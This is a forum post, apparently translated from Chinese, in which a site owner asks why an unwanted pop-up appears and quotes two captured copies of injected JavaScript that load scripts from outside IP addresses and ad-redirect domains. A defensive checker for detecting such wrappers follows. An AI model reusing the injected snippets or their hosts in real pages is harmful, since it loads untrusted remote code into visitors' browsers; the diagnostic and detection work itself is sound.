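A small site with no pop-ups of its own shows a pop-up when I open it. After a refresh the pop-up is gone, but when I open the site again some time later the pop-up is back. Viewing the page source, I found that the js in it had been tampered with, yet when I open the js on the server itself it is normal. That basically rules out a problem with the site's code. Search results online generally attribute this to China Telecom forcing in ads, but I have never seen it happen on any other site I visit; only this site gets the pop-up. Some also think it is an ARP attack. Hoping an expert can explain; this problem is giving me a real headache. The js code is attached below:
var _objparam_51_ = new Object;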
_objparam_51_.p = 1365966787;
_objparam_51_.aid = 49;
_objparam_51_.stat = 'http://76.73.85.179/stat/img.php?p='+_objparam_51_.p+'&aid='+_objparam_51_.aid+'&acid=1&area=440600&uid=31633&ucid=73';
_objparam_51_.otherstat = 'http://76.73.85.179/stat/otherstat.php?type=2&aid='+_objparam_51_.aid;
_objparam_51_.expires = 10;
_objparam_51_.oldurl = 'http://小站域名.com/js/bot2.js?p=1';
_objparam_51_.url = 'http://www.lftyx.com/a195338.php?W2Ce78=2&p=1365966787&c=1900483101';
window.setTimeout(function(){var a=document.createElement("script");a.src=_objparam_51_.oldurl;document.getElementsByTagName("head")[0].appendChild(a);},0);
window.setTimeout(function(){var a=document.createElement("script");a.src="http://76.73.85.179/js/utils51.js";document.getElementsByTagName("head")[0].appendChild(a);},0);
<!--
Here is another one:
var _objparam_51_ = new Object;
_objparam_51_.p = 1365972238;
_objparam_51_.aid = 45;
_objparam_51_.stat = 'http://67.159.44.187/stat/img.php?p='+_objparam_51_.p+'&aid='+_objparam_51_.aid+'&acid=1&area=440600&uid=31633&ucid=73';
_objparam_51_.otherstat = 'http://67.159.44.187/stat/otherstat.php?type=2&aid='+_objparam_51_.aid;
_objparam_51_.expires = 10;
_objparam_51_.oldurl = 'http://小站域名.com/js/xp.js?p=1';
_objparam_51_.url = 'http://www.51zhenxin.info/a195338.php?W2Ce78=1&p=1365972238&c=1900483101';
window.setTimeout(function(){var a=document.createElement("script");a.src=_objparam_51_.oldurl;document.getElementsByTagName("head")[0].appendChild(a);},0);
window.setTimeout(function(){var a=document.createElement("script");a.src="http://67.159.44.187/js/utils51.js";document.getElementsByTagName("head")[0].appendChild(a);},0);
<!--
As for 小站域名 (the site's domain name), I have omitted it.
Has anyone else run into this? Hoping for an answer, thanks in advance.
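One way to check whether the body received for a script URL is a wrapper shaped like the one quoted above (it re-requests the original file with a query string, then loads a script from another host) rather than the file on the server. This is an added example, not part of the original post; `analyzeScriptBody`, `site.example`, `ads.example.net` and `192.0.2.10` are constructed placeholders.

```javascript
// Added example. Samples are constructed, modelled on the wrapper in the post;
// site.example, ads.example.net and 192.0.2.10 are placeholders.
const SAMPLE_WRAPPER = [
  "var _objparam_51_ = new Object;",
  "_objparam_51_.oldurl = 'http://site.example/js/bot2.js?p=1';",
  "_objparam_51_.url = 'http://ads.example.net/a1.php?p=1';",
  'window.setTimeout(function(){var a=document.createElement("script");a.src=_objparam_51_.oldurl;' +
    'document.getElementsByTagName("head")[0].appendChild(a);},0);',
  'window.setTimeout(function(){var a=document.createElement("script");a.src="http://192.0.2.10/js/utils51.js";' +
    'document.getElementsByTagName("head")[0].appendChild(a);},0);',
].join("\n");
const SAMPLE_CLEAN =
  'function initMenu(){ var logo = "http://site.example/img/logo.png"; return logo; }';

// Inspect the body received for `requestedPath` on `siteHost`.
function analyzeScriptBody(body, siteHost, requestedPath) {
  const urls = [];
  const literal = /["'](https?:\/\/[^"']+)["']/g; // absolute URLs inside string literals
  let m;
  while ((m = literal.exec(body)) !== null) {
    try { urls.push(new URL(m[1])); } catch (e) { /* not a parseable URL, skip */ }
  }
  // Hosts referenced by the body that are not the site itself.
  const foreignHosts = [...new Set(
    urls.filter((u) => u.hostname !== siteHost).map((u) => u.hostname)
  )].sort();
  // The wrapper re-requests the very file that was asked for, with a marker query string.
  const reloadsSelf = urls.some(
    (u) => u.hostname === siteHost && u.pathname === requestedPath && u.search !== ""
  );
  // It also builds <script> elements at runtime to pull in further code.
  const injectsScript = /createElement\(\s*["']script["']\s*\)/.test(body);
  return {
    foreignHosts, reloadsSelf, injectsScript,
    suspicious: reloadsSelf && injectsScript && foreignHosts.length > 0,
  };
}

console.log(analyzeScriptBody(SAMPLE_WRAPPER, "site.example", "/js/bot2.js"));
console.log(analyzeScriptBody(SAMPLE_CLEAN, "site.example", "/js/bot2.js"));
```

Running the same check on the body fetched over HTTP from the affected network and on the file read directly from the server shows whether the two differ; `suspicious: true` only for the fetched copy is consistent with the response being altered somewhere between the server and the browser.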